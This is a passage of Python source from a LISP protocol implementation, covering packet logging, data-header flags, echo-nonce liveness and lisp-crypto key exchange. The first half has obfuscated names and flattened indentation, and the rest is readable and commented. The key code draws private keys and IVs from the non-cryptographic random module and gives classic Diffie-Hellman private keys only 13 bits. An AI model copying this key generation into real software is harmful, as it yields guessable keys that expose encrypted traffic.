IIi1iiIIi1i = ( IIi1iiIIi1i >> 16 ) ^ ( IIi1iiIIi1i & 0xffff )
self . udp_sport = 0xf000 | ( IIi1iiIIi1i & 0xfff )
def print_packet ( self , s_or_r , is_lisp_packet ) :
if ( is_lisp_packet == False ) :
i11IiIiii = "{} -> {}" . format ( self . inner_source . print_address ( ) ,
self . inner_dest . print_address ( ) )
dprint ( ( "{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..." ) . format ( bold ( s_or_r , False ) ,
green ( i11IiIiii , False ) , self . inner_tos ,
self . inner_ttl , len ( self . packet ) ,
lisp_format_packet ( self . packet [ 0 : 60 ] ) ) )
return
if ( s_or_r . find ( "Receive" ) != - 1 ) :
ii1IO0oo00o000 = "decap"
ii1IO0oo00o000 += "-vxlan" if self . udp_dport == LISP_VXLAN_DATA_PORT else ""
else :
ii1IO0oo00o000 = s_or_r
if ( ii1IO0oo00o000 in [ "Send" , "Replicate" ] or ii1IO0oo00o000 . find ( "Fragment" ) != - 1 ) :
ii1IO0oo00o000 = "encap"
oOOO00o00 = "{} -> {}" . format ( self . outer_source . print_address_no_iid ( ) ,
self . outer_dest . print_address_no_iid ( ) )
if ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
oOOo0ooO0 = ( "{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + "{}/{}, outer UDP: {} -> {}, " )
oOOo0ooO0 += bold ( "control-packet" , False ) + ": {} ..."
dprint ( oOOo0ooO0 . format ( bold ( s_or_r , False ) , red ( oOOO00o00 , False ) ,
self . outer_tos , self . outer_ttl , self . udp_sport ,
self . udp_dport , lisp_format_packet ( self . packet [ 0 : 56 ] ) ) )
return
else :
oOOo0ooO0 = ( "{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + "{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + "inner tos/ttl: {}/{}, length: {}, {}, packet: {} ..." )
if ( self . lisp_header . k_bits ) :
if ( ii1IO0oo00o000 == "encap" ) : ii1IO0oo00o000 = "encrypt/encap"
if ( ii1IO0oo00o000 == "decap" ) : ii1IO0oo00o000 = "decap/decrypt"
i11IiIiii = "{} -> {}" . format ( self . inner_source . print_address ( ) ,
self . inner_dest . print_address ( ) )
dprint ( oOOo0ooO0 . format ( bold ( s_or_r , False ) , red ( oOOO00o00 , False ) ,
self . outer_tos , self . outer_ttl , self . udp_sport , self . udp_dport ,
green ( i11IiIiii , False ) , self . inner_tos , self . inner_ttl ,
len ( self . packet ) , self . lisp_header . print_header ( ii1IO0oo00o000 ) ,
lisp_format_packet ( self . packet [ 0 : 56 ] ) ) )
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . inner_source , self . inner_dest ) )
def get_raw_socket ( self ) :
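#
# get_raw_socket
#
# Return the raw socket bound to the interface for this packet's
# instance-id, or None when the instance-id is unmapped or no bound
# socket exists; in the latter case the packet is dropped only when
# the LISP_ENFORCE_BINDTODEVICE environment variable is set.
#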
o0OoO0000o = str ( self . lisp_header . get_instance_id ( ) )
if ( o0OoO0000o == "0" ) : return ( None )
if ( o0OoO0000o not in lisp_iid_to_interface ) : return ( None )
II1i = lisp_iid_to_interface [ o0OoO0000o ]
IiII1iiI = II1i . get_socket ( )
if ( IiII1iiI == None ) :
Iii11I111Ii11 = bold ( "SO_BINDTODEVICE" , False )
i1OooO00oO00o = ( os . getenv ( "LISP_ENFORCE_BINDTODEVICE" ) != None )
lprint ( "{} required for multi-tenancy support, {} packet" . format ( Iii11I111Ii11 , "drop" if i1OooO00oO00o else "forward" ) )
if ( i1OooO00oO00o ) : return ( None )
o0OoO0000o = bold ( o0OoO0000o , False )
OooOOOoOoo0O0 = bold ( II1i . device , False )
dprint ( "Send packet on instance-id {} interface {}" . format ( o0OoO0000o , OooOOOoOoo0O0 ) )
return ( IiII1iiI )
def log_flow ( self , encap ) :
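#
# log_flow
#
# Append a (timestamp, direction, packet, self) entry to the in-memory
# flow log; when the log reaches LISP_FLOW_LOG_SIZE entries, or a
# ./log-flows file exists, hand the buffer to a writer thread and start
# a fresh one.
#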
global lisp_flow_log
Ii1i111iI = os . path . exists ( "./log-flows" )
if ( len ( lisp_flow_log ) == LISP_FLOW_LOG_SIZE or Ii1i111iI ) :
iII1ii = [ lisp_flow_log ]
lisp_flow_log = [ ]
threading . Thread ( target = lisp_write_flow_log , args = iII1ii ) . start ( )
if ( Ii1i111iI ) : os . system ( "rm ./log-flows" )
return
i1 = datetime . datetime . now ( )
lisp_flow_log . append ( [ i1 , encap , self . packet , self ] )
def print_flow ( self , ts , encap , packet ) :
ts = ts . strftime ( "%m/%d/%y %H:%M:%S.%f" ) [ : - 3 ]
III11i = "{}: {}" . format ( ts , "encap" if encap else "decap" )
I11IIIIiII = red ( self . outer_source . print_address_no_iid ( ) , False )
OoooO = red ( self . outer_dest . print_address_no_iid ( ) , False )
IIIi1IIiII11 = green ( self . inner_source . print_address ( ) , False )
I1IIi = green ( self . inner_dest . print_address ( ) , False )
if ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
III11i += " {}:{} -> {}:{}, LISP control message type {}\n"
III11i = III11i . format ( I11IIIIiII , self . udp_sport , OoooO , self . udp_dport ,
self . inner_version )
return ( III11i )
if ( self . outer_dest . is_null ( ) == False ) :
III11i += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
III11i = III11i . format ( I11IIIIiII , self . udp_sport , OoooO , self . udp_dport ,
len ( packet ) , self . outer_tos , self . outer_ttl )
if ( self . lisp_header . k_bits != 0 ) :
OO0oO = "\n"
if ( self . packet_error != "" ) :
OO0oO = " ({})" . format ( self . packet_error ) + OO0oO
III11i += ", encrypted" + OO0oO
return ( III11i )
if ( self . outer_dest . is_null ( ) == False ) :
packet = packet [ 36 : : ] if self . outer_version == 4 else packet [ 56 : : ]
ii1I = packet [ 9 ] if self . inner_version == 4 else packet [ 6 ]
ii1I = struct . unpack ( "B" , ii1I ) [ 0 ]
III11i += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
III11i = III11i . format ( IIIi1IIiII11 , I1IIi , len ( packet ) , self . inner_tos ,
self . inner_ttl , ii1I )
if ( ii1I in [ 6 , 17 ] ) :
ii1iiIiiiI11 = packet [ 20 : 24 ] if self . inner_version == 4 else packet [ 40 : 44 ]
if ( len ( ii1iiIiiiI11 ) == 4 ) :
ii1iiIiiiI11 = socket . ntohl ( struct . unpack ( "I" , ii1iiIiiiI11 ) [ 0 ] )
III11i += ", ports {} -> {}" . format ( ii1iiIiiiI11 >> 16 , ii1iiIiiiI11 & 0xffff )
elif ( ii1I == 1 ) :
I1ii = packet [ 26 : 28 ] if self . inner_version == 4 else packet [ 46 : 48 ]
if ( len ( I1ii ) == 2 ) :
I1ii = socket . ntohs ( struct . unpack ( "H" , I1ii ) [ 0 ] )
III11i += ", icmp-seq {}" . format ( I1ii )
if ( self . packet_error != "" ) :
III11i += " ({})" . format ( self . packet_error )
III11i += "\n"
return ( III11i )
def is_trace ( self ) :
ii1iiIiiiI11 = [ self . inner_sport , self . inner_dport ]
return ( self . inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ii1iiIiiiI11 )
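#
# Flag bits in the first 32-bit word of the 8-byte LISP data header
# (RFC 6830 section 5.3): N nonce-present, L locator-status-bits,
# E echo-nonce-request, V map-version, I instance-id, P, plus the two
# key-id bits (KK) used by lisp-crypto.
#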
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
class lisp_data_header ( ) :
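#
# Encode/decode support for the 8-byte LISP data header: the flag bits
# and 24-bit nonce (or map-version) live in the first long, the 24-bit
# instance-id and 8 locator-status-bits in the second.
#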
def __init__ ( self ) :
self . first_long = 0
self . second_long = 0
self . k_bits = 0
def print_header ( self , e_or_d ) :
iII = lisp_hex_string ( self . first_long & 0xffffff )
oooO0 = lisp_hex_string ( self . second_long ) . zfill ( 8 )
oOOo0ooO0 = ( "{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + "iid/lsb: {}" )
return ( oOOo0ooO0 . format ( bold ( e_or_d , False ) ,
"N" if ( self . first_long & LISP_N_BIT ) else "n" ,
"L" if ( self . first_long & LISP_L_BIT ) else "l" ,
"E" if ( self . first_long & LISP_E_BIT ) else "e" ,
"V" if ( self . first_long & LISP_V_BIT ) else "v" ,
"I" if ( self . first_long & LISP_I_BIT ) else "i" ,
"P" if ( self . first_long & LISP_P_BIT ) else "p" ,
"K" if ( self . k_bits in [ 2 , 3 ] ) else "k" ,
"K" if ( self . k_bits in [ 1 , 3 ] ) else "k" ,
iII , oooO0 ) )
def encode ( self ) :
i1I1iii1I11II = "II"
iII = socket . htonl ( self . first_long )
oooO0 = socket . htonl ( self . second_long )
O0ooOoO0 = struct . pack ( i1I1iii1I11II , iII , oooO0 )
return ( O0ooOoO0 )
def decode ( self , packet ) :
i1I1iii1I11II = "II"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( False )
iII , oooO0 = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
self . first_long = socket . ntohl ( iII )
self . second_long = socket . ntohl ( oooO0 )
self . k_bits = ( self . first_long & LISP_K_BITS ) >> 24
return ( True )
def key_id ( self , key_id ) :
self . first_long &= ~ ( 0x3 << 24 )
self . first_long |= ( ( key_id & 0x3 ) << 24 )
self . k_bits = key_id
def nonce ( self , nonce ) :
self . first_long |= LISP_N_BIT
self . first_long |= nonce
def map_version ( self , version ) :
self . first_long |= LISP_V_BIT
self . first_long |= version
def instance_id ( self , iid ) :
if ( iid == 0 ) : return
self . first_long |= LISP_I_BIT
self . second_long &= 0xff
self . second_long |= ( iid << 8 )
def get_instance_id ( self ) :
return ( ( self . second_long >> 8 ) & 0xffffff )
def locator_status_bits ( self , lsbs ) :
self . first_long |= LISP_L_BIT
self . second_long &= 0xffffff00
self . second_long |= ( lsbs & 0xff )
def is_request_nonce ( self , nonce ) :
return ( nonce & 0x80000000 )
def request_nonce ( self , nonce ) :
self . first_long |= LISP_E_BIT
self . first_long |= LISP_N_BIT
self . first_long |= ( nonce & 0xffffff )
def is_e_bit_set ( self ) :
return ( self . first_long & LISP_E_BIT )
def get_nonce ( self ) :
return ( self . first_long & 0xffffff )
class lisp_echo_nonce ( ) :
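#
# Per-RLOC state for the echo-nonce RLOC-liveness algorithm (RFC 6830
# section 6.3.1): which nonces have been requested, echoed, and
# received, with timestamps that drive the up/down decisions in
# change_state().
#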
def __init__ ( self , rloc_str ) :
self . rloc_str = rloc_str
self . rloc = lisp_address ( LISP_AFI_NONE , rloc_str , 0 , 0 )
self . request_nonce_sent = None
self . echo_nonce_sent = None
self . last_request_nonce_sent = None
self . last_new_request_nonce_sent = None
self . last_echo_nonce_sent = None
self . last_new_echo_nonce_sent = None
self . request_nonce_rcvd = None
self . echo_nonce_rcvd = None
self . last_request_nonce_rcvd = None
self . last_echo_nonce_rcvd = None
self . last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list [ rloc_str ] = self
def send_ipc ( self , ipc_socket , ipc ) :
i1IIi1ii1i1ii = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
oo0OoO = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc ( ipc , i1IIi1ii1i1ii )
lisp_ipc ( ipc , ipc_socket , oo0OoO )
def send_request_ipc ( self , ipc_socket , nonce ) :
nonce = lisp_hex_string ( nonce )
iiiii1i1 = "nonce%R%{}%{}" . format ( self . rloc_str , nonce )
self . send_ipc ( ipc_socket , iiiii1i1 )
def send_echo_ipc ( self , ipc_socket , nonce ) :
nonce = lisp_hex_string ( nonce )
iiiii1i1 = "nonce%E%{}%{}" . format ( self . rloc_str , nonce )
self . send_ipc ( ipc_socket , iiiii1i1 )
def receive_request ( self , ipc_socket , nonce ) :
iiII1iiI = self . request_nonce_rcvd
self . request_nonce_rcvd = nonce
self . last_request_nonce_rcvd = lisp_get_timestamp ( )
if ( lisp_i_am_rtr ) : return
if ( iiII1iiI != nonce ) : self . send_request_ipc ( ipc_socket , nonce )
def receive_echo ( self , ipc_socket , nonce ) :
if ( self . request_nonce_sent != nonce ) : return
self . last_echo_nonce_rcvd = lisp_get_timestamp ( )
if ( self . echo_nonce_rcvd == nonce ) : return
self . echo_nonce_rcvd = nonce
if ( lisp_i_am_rtr ) : return
self . send_echo_ipc ( ipc_socket , nonce )
def get_request_or_echo_nonce ( self , ipc_socket , remote_rloc ) :
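#
# get_request_or_echo_nonce
#
# Decide what nonce the next data packet should carry: echo a nonce the
# neighbor asked for, start or continue request-nonce mode (returning
# the nonce with the high-order bit set), or return None once
# request-nonce mode times out. When both sides request at once, the
# side with the higher RLOC address stays in request-nonce mode.
#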
if ( self . request_nonce_sent and self . echo_nonce_sent and remote_rloc ) :
iI1iIiii111 = lisp_myrlocs [ 0 ] if remote_rloc . is_ipv4 ( ) else lisp_myrlocs [ 1 ]
if ( remote_rloc . address > iI1iIiii111 . address ) :
OO0o = "exit"
self . request_nonce_sent = None
else :
OO0o = "stay in"
self . echo_nonce_sent = None
oOOoooo0o0 = bold ( "collision" , False )
I11iIi1i1I1i1 = red ( iI1iIiii111 . print_address_no_iid ( ) , False )
O0OOOO0o0O = red ( remote_rloc . print_address_no_iid ( ) , False )
lprint ( "Echo nonce {}, {} -> {}, {} request-nonce mode" . format ( oOOoooo0o0 ,
I11iIi1i1I1i1 , O0OOOO0o0O , OO0o ) )
if ( self . echo_nonce_sent != None ) :
Iii11I = self . echo_nonce_sent
oOo = bold ( "Echoing" , False )
lprint ( "{} nonce 0x{} to {}" . format ( oOo ,
lisp_hex_string ( Iii11I ) , red ( self . rloc_str , False ) ) )
self . last_echo_nonce_sent = lisp_get_timestamp ( )
self . echo_nonce_sent = None
return ( Iii11I )
Iii11I = self . request_nonce_sent
iiI = self . last_request_nonce_sent
if ( Iii11I and iiI != None ) :
if ( time . time ( ) - iiI >= LISP_NONCE_ECHO_INTERVAL ) :
self . request_nonce_sent = None
lprint ( "Stop request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( Iii11I ) ) )
return ( None )
if ( Iii11I == None ) :
Iii11I = lisp_get_data_nonce ( )
if ( self . recently_requested ( ) ) : return ( Iii11I )
self . request_nonce_sent = Iii11I
lprint ( "Start request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( Iii11I ) ) )
self . last_new_request_nonce_sent = lisp_get_timestamp ( )
if ( lisp_i_am_itr == False ) : return ( Iii11I | 0x80000000 )
self . send_request_ipc ( ipc_socket , Iii11I )
else :
lprint ( "Continue request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( Iii11I ) ) )
self . last_request_nonce_sent = lisp_get_timestamp ( )
return ( Iii11I | 0x80000000 )
def request_nonce_timeout ( self ) :
if ( self . request_nonce_sent == None ) : return ( False )
if ( self . request_nonce_sent == self . echo_nonce_rcvd ) : return ( False )
oO000o0Oo00 = time . time ( ) - self . last_request_nonce_sent
i1I111II = self . last_echo_nonce_rcvd
return ( oO000o0Oo00 >= LISP_NONCE_ECHO_INTERVAL and i1I111II == None )
def recently_requested ( self ) :
i1I111II = self . last_request_nonce_sent
if ( i1I111II == None ) : return ( False )
oO000o0Oo00 = time . time ( ) - i1I111II
return ( oO000o0Oo00 <= LISP_NONCE_ECHO_INTERVAL )
def recently_echoed ( self ) :
if ( self . request_nonce_sent == None ) : return ( True )
i1I111II = self . last_good_echo_nonce_rcvd
if ( i1I111II == None ) : i1I111II = 0
oO000o0Oo00 = time . time ( ) - i1I111II
if ( oO000o0Oo00 <= LISP_NONCE_ECHO_INTERVAL ) : return ( True )
i1I111II = self . last_new_request_nonce_sent
if ( i1I111II == None ) : i1I111II = 0
oO000o0Oo00 = time . time ( ) - i1I111II
return ( oO000o0Oo00 <= LISP_NONCE_ECHO_INTERVAL )
def change_state ( self , rloc ) :
if ( rloc . up_state ( ) and self . recently_echoed ( ) == False ) :
i1Ii = bold ( "down" , False )
I1i = lisp_print_elapsed ( self . last_good_echo_nonce_rcvd )
lprint ( "Take {} {}, last good echo: {}" . format ( red ( self . rloc_str , False ) , i1Ii , I1i ) )
rloc . state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc . last_state_change = lisp_get_timestamp ( )
return
if ( rloc . no_echoed_nonce_state ( ) == False ) : return
if ( self . recently_requested ( ) == False ) :
oOOo = bold ( "up" , False )
lprint ( "Bring {} {}, retry request-nonce mode" . format ( red ( self . rloc_str , False ) , oOOo ) )
rloc . state = LISP_RLOC_UP_STATE
rloc . last_state_change = lisp_get_timestamp ( )
def print_echo_nonce ( self ) :
I1I = lisp_print_elapsed ( self . last_request_nonce_sent )
OOo = lisp_print_elapsed ( self . last_good_echo_nonce_rcvd )
IiIiIiIII1Iii = lisp_print_elapsed ( self . last_echo_nonce_sent )
OOoO = lisp_print_elapsed ( self . last_request_nonce_rcvd )
IiII1iiI = space ( 4 )
Oo0Ooo0O0 = "Nonce-Echoing:\n"
Oo0Ooo0O0 += ( "{}Last request-nonce sent: {}\n{}Last echo-nonce " + "received: {}\n" ) . format ( IiII1iiI , I1I , IiII1iiI , OOo )
Oo0Ooo0O0 += ( "{}Last request-nonce received: {}\n{}Last echo-nonce " + "sent: {}" ) . format ( IiII1iiI , OOoO , IiII1iiI , IiIiIiIII1Iii )
return ( Oo0Ooo0O0 )
class lisp_keys ( ) :
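#
# Key state for lisp-crypto (RFC 8061): a classic Diffie-Hellman or
# curve25519 ECDH keypair per key-id, the negotiated cipher suite
# (AES-CBC, AES-GCM, or chacha20), and the derived encryption and ICV
# keys along with the IV counter.
#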
def __init__ ( self , key_id , do_curve = True , do_chacha = use_chacha ,
do_poly = use_poly ) :
self . uptime = lisp_get_timestamp ( )
self . last_rekey = None
self . rekey_count = 0
self . use_count = 0
self . key_id = key_id
self . cipher_suite = LISP_CS_1024
self . dh_g_value = LISP_CS_1024_G
self . dh_p_value = LISP_CS_1024_P
self . curve25519 = None
self . cipher_suite_string = ""
if ( do_curve ) :
if ( do_chacha ) :
self . cipher_suite = LISP_CS_25519_CHACHA
self . cipher_suite_string = "chacha"
elif ( os . getenv ( "LISP_USE_AES_GCM" ) != None ) :
self . cipher_suite = LISP_CS_25519_GCM
self . cipher_suite_string = "aes-gcm"
else :
self . cipher_suite = LISP_CS_25519_CBC
self . cipher_suite_string = "aes-cbc"
self . local_private_key = random . randint ( 0 , 2 ** 128 - 1 )
Oo000O000 = lisp_hex_string ( self . local_private_key ) . zfill ( 32 )
self . curve25519 = curve25519 . Private ( Oo000O000 )
else :
self . local_private_key = random . randint ( 0 , 0x1fff )
self . local_public_key = self . compute_public_key ( )
self . remote_public_key = None
self . shared_key = None
self . encrypt_key = None
self . icv_key = None
self . icv = poly1305 if do_poly else hashlib . sha256
self . iv = None
self . get_iv ( )
self . do_poly = do_poly
def copy_keypair ( self , key ) :
self . local_private_key = key . local_private_key
self . local_public_key = key . local_public_key
self . curve25519 = key . curve25519
def get_iv ( self ) :
if ( self . iv == None ) :
self . iv = random . randint ( 0 , LISP_16_128_MASK )
else :
self . iv += 1
iiI1iiIiiiI1I = self . iv
if ( self . cipher_suite == LISP_CS_25519_CHACHA ) :
iiI1iiIiiiI1I = struct . pack ( "Q" , iiI1iiIiiiI1I & LISP_8_64_MASK )
elif ( self . cipher_suite == LISP_CS_25519_GCM ) :
i1II111II1 = struct . pack ( "I" , ( iiI1iiIiiiI1I >> 64 ) & LISP_4_32_MASK )
I11I1iiI1 = struct . pack ( "Q" , iiI1iiIiiiI1I & LISP_8_64_MASK )
iiI1iiIiiiI1I = i1II111II1 + I11I1iiI1
else :
iiI1iiIiiiI1I = struct . pack ( "QQ" , iiI1iiIiiiI1I >> 64 , iiI1iiIiiiI1I & LISP_8_64_MASK )
return ( iiI1iiIiiiI1I )
def key_length ( self , key ) :
if ( type ( key ) != str ) : key = self . normalize_pub_key ( key )
return ( len ( key ) / 2 )
def print_key ( self , key ) :
oOoOOoo = self . normalize_pub_key ( key )
return ( "0x{}...{}({})" . format ( oOoOOoo [ 0 : 4 ] , oOoOOoo [ - 4 : : ] , self . key_length ( oOoOOoo ) ) )
def normalize_pub_key ( self , key ) :
if ( type ( key ) == str ) :
if ( self . curve25519 ) : return ( binascii . hexlify ( key ) )
return ( key )
key = lisp_hex_string ( key ) . zfill ( 256 )
return ( key )
def print_keys ( self , do_bold = True ) :
I11iIi1i1I1i1 = bold ( "local-key: " , False ) if do_bold else "local-key: "
if ( self . local_public_key == None ) :
I11iIi1i1I1i1 += "none"
else :
I11iIi1i1I1i1 += self . print_key ( self . local_public_key )
O0OOOO0o0O = bold ( "remote-key: " , False ) if do_bold else "remote-key: "
if ( self . remote_public_key == None ) :
O0OOOO0o0O += "none"
else :
O0OOOO0o0O += self . print_key ( self . remote_public_key )
III1I1Iii1 = "ECDH" if ( self . curve25519 ) else "DH"
IIIiIII1 = self . cipher_suite
return ( "{} cipher-suite: {}, {}, {}" . format ( III1I1Iii1 , IIIiIII1 , I11iIi1i1I1i1 , O0OOOO0o0O ) )
    def compare_keys(self, keys):
        if (self.dh_g_value != keys.dh_g_value): return(False)
        if (self.dh_p_value != keys.dh_p_value): return(False)
        if (self.remote_public_key != keys.remote_public_key): return(False)
        return(True)

    def compute_public_key(self):
        if (self.curve25519): return(self.curve25519.get_public().public)

        key = self.local_private_key
        g = self.dh_g_value
        p = self.dh_p_value
        return(int((g ** key) % p))

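    #
    # A worked sketch of the non-curve25519 branch above (classic
    # Diffie-Hellman, toy numbers for illustration only):
    #
    #   g = 5, p = 23
    #   a = 6  ->  A = (5**6)  % 23 = 8     # local public key
    #   b = 15 ->  B = (5**15) % 23 = 19    # remote public key
    #   (B**a) % p == (A**b) % p == 2       # identical shared secret
    #
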
    def compute_shared_key(self, ed, print_shared=False):
        key = self.local_private_key
        remote_key = self.remote_public_key

        header = bold("Compute {} shared-key".format(ed), False)
        lprint("{}, key-material: {}".format(header, self.print_keys()))

        if (self.curve25519):
            public = curve25519.Public(remote_key)
            self.shared_key = self.curve25519.get_shared_key(public)
        else:
            p = self.dh_p_value
            self.shared_key = (remote_key ** key) % p

        #
        # Print shared-key only when the caller asks (debugging aid).
        #
        if (print_shared):
            shared = self.print_key(self.shared_key)
            lprint("Computed shared-key: {}".format(shared))

        #
        # Derive the encryption and ICV keys from the shared secret.
        #
        self.compute_encrypt_icv_keys()

        #
        # Bump rekeying state.
        #
        self.rekey_count += 1
        self.last_rekey = lisp_get_timestamp()

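    #
    # Typical call sequence (a sketch; the remote key normally arrives in
    # a Security Type LCAF via decode_lcaf()):
    #
    #   keys = lisp_keys(1)
    #   ... keys.decode_lcaf(packet, 0) stores remote_public_key ...
    #   keys.compute_shared_key("decap")   # also derives encrypt/icv keys
    #
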
    def compute_encrypt_icv_keys(self):
        alg = hashlib.sha256
        if (self.curve25519):
            data = self.shared_key
        else:
            data = lisp_hex_string(self.shared_key)

        #
        # The HMAC key is a fixed context string folded with the XOR of
        # the two public keys.
        #
        local_key = self.local_public_key
        if (type(local_key) != long):
            local_key = int(binascii.hexlify(local_key), 16)
        remote_key = self.remote_public_key
        if (type(remote_key) != long):
            remote_key = int(binascii.hexlify(remote_key), 16)
        context = "0001" + "lisp-crypto" + \
            lisp_hex_string(local_key ^ remote_key) + "0100"

        key_material = hmac.new(context, data, alg).hexdigest()
        key_material = int(key_material, 16)

        #
        # Split the 256 bits of key-material in half: high half becomes
        # the encryption key, low half the ICV key.
        #
        encrypt_key = (key_material >> 128) & LISP_16_128_MASK
        icv_key = key_material & LISP_16_128_MASK
        self.encrypt_key = lisp_hex_string(encrypt_key).zfill(32)
        fill = 32 if self.do_poly else 40
        self.icv_key = lisp_hex_string(icv_key).zfill(fill)

    def do_icv(self, packet, nonce):
        if (self.icv_key == None): return("")
        if (self.do_poly):
            poly = self.icv.poly1305aes
            hexlify = self.icv.binascii.hexlify
            nonce = hexlify(nonce)
            hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
            hash_output = hexlify(hash_output)
        else:
            key = binascii.unhexlify(self.icv_key)
            hash_output = hmac.new(key, packet, self.icv).hexdigest()
            hash_output = hash_output[0:40]

        return(hash_output)

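    #
    # Two ICV flavors are supported above: poly1305aes produces a 16-byte
    # MAC (hex-encoded to 32 characters), while the hmac-sha256 branch
    # truncates the hex digest to 40 characters, i.e. a 160-bit ICV.
    #
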
    def add_key_by_nonce(self, nonce):
        if (lisp_crypto_keys_by_nonce.has_key(nonce) == False):
            lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]

        lisp_crypto_keys_by_nonce[nonce][self.key_id] = self

    def delete_key_by_nonce(self, nonce):
        if (lisp_crypto_keys_by_nonce.has_key(nonce) == False): return
        lisp_crypto_keys_by_nonce.pop(nonce)

    def add_key_by_rloc(self, addr_str, encap):
        by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
            lisp_crypto_keys_by_rloc_decap

        if (by_rlocs.has_key(addr_str) == False):
            by_rlocs[addr_str] = [None, None, None, None]

        by_rlocs[addr_str][self.key_id] = self

        #
        # Tell the data-plane process about new decap keys.
        #
        if (encap == False):
            lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])

    def encode_lcaf(self, rloc_addr):
        pub_key = self.normalize_pub_key(self.local_public_key)
        key_len = self.key_length(pub_key)
        sec_len = (6 + key_len + 2)
        if (rloc_addr != None): sec_len += rloc_addr.addr_length()

        packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
            LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)

        #
        # Encode cipher-suite, a reserved byte, and the key-length.
        #
        cs = self.cipher_suite
        packet += struct.pack("BBH", cs, 0, socket.htons(key_len))

        #
        # Encode the public key, 8 bytes at a time, in network byte order.
        #
        for i in range(0, key_len * 2, 16):
            key = int(pub_key[i:i+16], 16)
            packet += struct.pack("Q", byte_swap_64(key))

        #
        # Append the RLOC address, if supplied.
        #
        if (rloc_addr):
            packet += struct.pack("H", socket.htons(rloc_addr.afi))
            packet += rloc_addr.pack_address()

        return(packet)

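    #
    # Byte layout of the Security Type LCAF produced by encode_lcaf(),
    # following the struct formats used above:
    #
    #   AFI=LCAF (2) | rsvd (1) | flags (1) | Type=Security (1) | rsvd (1)
    #   length (2) | key-count=1 (1) | rsvd (1) | cipher-suite (1)
    #   rsvd (1) | key-length (2) | public-key (key-length bytes)
    #   [ AFI (2) | RLOC address ]
    #
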
    def decode_lcaf(self, packet, lcaf_len):

        #
        # Called with lcaf_len of 0 when the LCAF header has not been
        # parsed yet. Skip over the LCAF if it is not a Security Type.
        #
        if (lcaf_len == 0):
            packet_format = "HHBBH"
            format_size = struct.calcsize(packet_format)
            if (len(packet) < format_size): return(None)

            afi, rsvd1, lcaf_type, rsvd2, lcaf_len = struct.unpack(
                packet_format, packet[:format_size])

            if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
                packet = packet[lcaf_len + 6::]
                return(packet)

            lcaf_len = socket.ntohs(lcaf_len)
            packet = packet[format_size::]

        #
        # Parse key-count, cipher-suite, and key-length.
        #
        lcaf_type = LISP_LCAF_SECURITY_TYPE
        packet_format = "BBBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        key_count, rsvd, cipher_suite, rsvd2, key_len = struct.unpack(
            packet_format, packet[:format_size])

        #
        # Advance past the fixed fields and make sure the key material is
        # all there.
        #
        packet = packet[format_size::]
        key_len = socket.ntohs(key_len)
        if (len(packet) < key_len): return(None)

        #
        # Reject unsupported cipher suites.
        #
        cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
            LISP_CS_1024]
        if (cipher_suite not in cs_list):
            lprint("Cipher-suites {} supported, received {}".format(cs_list,
                cipher_suite))
            packet = packet[key_len::]
            return(packet)

        self.cipher_suite = cipher_suite

        #
        # Parse the remote public-key, 8 bytes at a time, byte-swapping
        # each 64-bit word out of network order.
        #
        pub_key = 0
        for i in range(0, key_len, 8):
            key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
            pub_key <<= 64
            pub_key |= key

        self.remote_public_key = pub_key

        #
        # When curve25519 is in use, the remote key must be a 32-byte
        # binary string rather than an integer.
        #
        if (self.curve25519):
            key = lisp_hex_string(self.remote_public_key)
            key = key.zfill(64)
            key_bytes = ""
            for i in range(0, len(key), 2):
                key_bytes += chr(int(key[i:i+2], 16))

            self.remote_public_key = key_bytes

        packet = packet[key_len::]
        return(packet)

class lisp_thread():
    def __init__(self, name):
        self.thread_name = name
        self.thread_number = -1
        self.number_of_pcap_threads = 0
        self.number_of_worker_threads = 0
        self.input_queue = Queue.Queue()
        self.input_stats = lisp_stats()
        self.lisp_packet = lisp_packet(None)

class lisp_control_header():
    def __init__(self):
        self.type = 0
        self.record_count = 0
        self.nonce = 0
        self.rloc_probe = False
        self.smr_bit = False
        self.smr_invoked_bit = False
        self.ddt_bit = False
        self.to_etr = False
        self.to_ms = False
        self.info_reply = False

    def decode(self, packet):
        packet_format = "BBBBQ"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(False)

        typeval, bits, rsvd, self.record_count, self.nonce = struct.unpack(
            packet_format, packet[:format_size])

        self.type = typeval >> 4
        if (self.type == LISP_MAP_REQUEST):
            self.smr_bit = True if (typeval & 0x01) else False
            self.rloc_probe = True if (typeval & 0x02) else False
            self.smr_invoked_bit = True if (bits & 0x40) else False

        if (self.type == LISP_ECM):
            self.ddt_bit = True if (typeval & 0x04) else False
